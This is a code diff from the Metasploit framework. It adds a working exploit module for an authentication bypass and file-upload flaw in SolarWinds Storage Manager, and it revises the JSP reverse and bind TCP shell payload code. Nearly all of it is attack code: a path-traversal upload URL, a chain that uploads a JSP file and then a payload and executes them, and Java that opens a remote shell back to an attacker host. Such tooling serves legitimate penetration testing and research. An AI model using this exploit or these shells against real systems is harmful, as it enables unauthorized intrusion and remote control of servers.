Land #3727 - SolarWinds Storage Manager exploit AND Msf::Payload::JSP

lib/msf/core/payload/jsp.rb

@@ -2,8 +2,23 @@
 require 'msf/core'
 require 'rex'
 
+# This module is chained within JSP payloads that target the Java platform.
+# It provides methods to generate Java / JSP code.
 module Msf::Payload::JSP
+
+  # @param attributes [Hash{Symbol => String,nil}]
+  def initialize(info = {})
+    ret = super(info)
+
+    register_options([
+      Msf::OptString.new( 'SHELL', [false, 'The system shell to use.'])
+    ], Msf::Payload::JSP )
+
+    ret
+  end
+
   # Outputs jsp that spawns a bind TCP shell
+  #
   # @return [String] jsp code that executes bind TCP payload
   def jsp_bind_tcp
     # Modified from: http://www.security.org.sg/code/jspreverse.html
@@ -53,20 +68,22 @@ module Msf::Payload::JSP
 
   try
   {
+    #{shell_path}
     ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
     Socket client_socket = server_socket.accept();
     server_socket.close();
-    Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+    Process process = Runtime.getRuntime().exec( ShellPath );
     ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
     ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
   } catch( Exception e ) {}
 %>
     EOS
 
-    return jsp
+    jsp
   end
 
   # Outputs jsp code that spawns a reverse TCP shell
+  #
   # @return [String] jsp code that executes reverse TCP payload
   def jsp_reverse_tcp
     # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
@@ -116,17 +133,20 @@ module Msf::Payload::JSP
 
   try
   {
+    #{shell_path}
     Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
-    Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+    Process process = Runtime.getRuntime().exec( ShellPath );
     ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
     ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
   } catch( Exception e ) {}
 %>
     EOS
-    return jsp
+
+    jsp
   end
 
   # Wraps the jsp payload into a war
+  #
   # @return [Rex::Zip::Jar] a war to execute the jsp payload
   def generate_war
     jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
@@ -151,4 +171,28 @@ module Msf::Payload::JSP
 
     zip
   end
+
+  # Outputs Java code to assign the system shell path to a variable.
+  #
+  # It uses the datastore if a value has been provided, otherwise
+  # tries to guess the system shell path bad on the os target.
+  #
+  # @return [String] the Java code.
+  def shell_path
+    if datastore['SHELL'] && !datastore['SHELL'].empty?
+      jsp =  "String ShellPath = \"#{datastore['SHELL']}\";"
+    else
+      jsp = <<-EOS
+String ShellPath;
+if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
+  ShellPath = new String("/bin/sh");
+} else {
+  ShellPath = new String("cmd.exe");
+}
+      EOS
+    end
+
+    jsp
+  end
+
 end

modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb

@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'SolarWinds Storage Manager Authentication Bypass',
+      'Description' => %q{
+        This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
+        The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication
+        with specially crafted URLs. After bypassing authentication, is possible to use a file
+        upload function to achieve remote code execution. This module has been tested successfully
+        in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and
+        Linux 64 bits operating systems.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['ZDI', '14-299']
+        ],
+      'Privileged'  => true,
+      'Platform'       => %w{ linux win },
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          ['Solarwinds Store Manager <= 5.7.1', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 19 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9000)
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+                               'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
+                               'method' => 'POST',
+                               'ctype'  => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
+                           })
+
+    if  res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+    print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
+    if upload(jsp_info, jsp_path)
+      print_good("#{peer} - JSP payload uploaded successfully")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
+    end
+
+    res = execute(jsp_info)
+
+    if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
+      upload_path = $1
+      print_good("#{peer} - Working directory found in #{upload_path}")
+      register_file_for_cleanup(::File.join(upload_path, jsp_info))
+    else
+      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
+      print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
+    end
+
+    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
+    if upload(jsp_payload, payload.encoded)
+      print_good("#{peer} - JSP payload uploaded successfully")
+    else
+      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
+    end
+
+    if upload_path
+      register_file_for_cleanup(::File.join(upload_path, jsp_payload))
+    else
+      print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
+    end
+
+    print_status("#{peer} - Executing payload...")
+    execute(jsp_payload, 1)
+  end
+
+  def execute(jsp_name, time_out = 20)
+    res = send_request_cgi({
+                         'uri'    => normalize_uri("/", "images", "..", jsp_name),
+                         'method' => 'GET'
+                     }, time_out)
+
+    res
+  end
+
+  def upload(file_name, contents)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(contents,
+                       "application/octet-stream",
+                       nil,
+                       "form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")
+
+    res = send_request_cgi({
+                               'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
+                               'method' => 'POST',
+                               'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+                               'data'   => post_data.to_s
+                           })
+
+    if  res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
+      return true
+    end
+
+    false
+  end
+
+  def jsp_path
+    jsp =<<-EOS
+<%@ page language="Java" import="java.util.*"%>
+<%
+out.println("Path:" + System.getProperty("server.webapp.root"));
+%>
+    EOS
+
+    jsp
+  end
+
+end

modules/exploits/windows/http/adobe_robohelper_authbypass.rb

@@ -42,6 +42,10 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Sep 23 2009'
     ))

modules/exploits/windows/http/coldfusion_fckeditor.rb

@@ -39,6 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 3 2009'
     ))

modules/exploits/windows/http/hp_imc_bims_upload.rb

@@ -40,6 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'  => true,
       'Platform'    => 'win',
       'Arch'        => ARCH_JAVA,
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'Targets'     =>
         [
           [ 'HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows', { } ]

modules/exploits/windows/http/hp_imc_mibfileupload.rb

@@ -40,6 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'  => true,
       'Platform'    => 'win',
       'Arch' => ARCH_JAVA,
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'Targets'     =>
         [
           [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ]

modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb

@@ -41,6 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'  => true,
       'Platform'    => 'win',
       'Arch'        => ARCH_JAVA,
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'Targets'     =>
         [
           [ 'HP LoadRunner 11.52', { } ],

modules/exploits/windows/http/hp_openview_insight_backdoor.rb

@@ -44,6 +44,10 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 31 2011'))
 

modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb

@@ -38,6 +38,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => true,
       'Platform'       => 'win',
       'Arch'           => ARCH_JAVA,
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'Targets'        =>
         [
           [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]

modules/exploits/windows/http/hp_pcm_snac_update_domain.rb

@@ -38,6 +38,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => true,
       'Platform'       => 'win',
       'Arch'           => ARCH_JAVA,
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'Targets'        =>
         [
           [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]

modules/exploits/windows/http/novell_imanager_upload.rb

@@ -44,6 +44,10 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
+      'DefaultOptions' =>
+        {
+          'SHELL' => 'cmd.exe'
+        },
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Oct 01 2010'
     ))

modules/payloads/singles/java/jsp_shell_bind_tcp.rb

@@ -31,7 +31,6 @@ module Metasploit3
           'Payload' => ''
         }
       ))
-    register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
   end
 
 

modules/payloads/singles/java/jsp_shell_reverse_tcp.rb

@@ -31,7 +31,6 @@ module Metasploit3
           'Payload' => ''
         }
       ))
-    register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
   end